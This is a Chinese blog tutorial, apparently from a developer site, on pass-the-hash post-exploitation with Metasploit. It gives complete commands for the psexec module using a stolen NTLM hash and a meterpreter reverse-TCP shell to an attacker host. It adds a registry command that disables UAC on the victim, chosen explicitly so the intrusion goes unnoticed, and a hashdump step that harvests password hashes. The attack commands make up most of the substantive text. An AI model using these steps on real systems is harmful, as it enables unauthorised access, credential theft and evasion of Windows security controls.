后渗透模块之Hash传递

前言

我们有时候获取到了用户的hash值但是不能正确地解出密码,这是因为hash解码是需要碰撞的,成功的几率也不是特别高,因此我们使用另一种方式,直接使用hash值登录目标系统。

利用过程

前提是我们已经获取到了目标系统的SYSTEM权限,然后我们利用smb下的psexec这个模块
在这里插入图片描述

use exploit/windows/smb/psexec
set rhosts 192.168.75.139
set smbuser pyh(普通管理员账户)
set smbpass aad3b435b51404eeaad3b435b51404ee:588feb889288fb953b5f094d47d1565c
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.75.128
set lport 3333
show options
run

在这里插入图片描述

执行攻击之后发现我们的攻击被UAC阻拦了
在这里插入图片描述
这里提供两种关闭UAC的方式,第一种是直接在Windows系统中的控制面板中的用户和账户,管理用户控制设置,然后将其调到最低。
在这里插入图片描述
在这里插入图片描述
但是考虑到你在渗透别人的系统,不可能先通知别人先关闭防火墙,这样我们的行踪就会暴露,因此我提倡使用第二种方式,通过得到的shell改变UAC注册表总的值

进入shell后,执行reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,路径符号一定要写对,那个是UAC在注册表中的位置
在这里插入图片描述
修改成功后使用shutdown -g重启电脑,在这之前,我提倡先使用hashdump模块对普通密码进行猜解

use post/windows/gather/hashdump
set session 4
run

在这里插入图片描述

总结:在我们对目标的hash值不能进行爆破成功的时候,我们可以采用hash传递的方式登入目标系统,这也不失为一种好的渗透思路。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值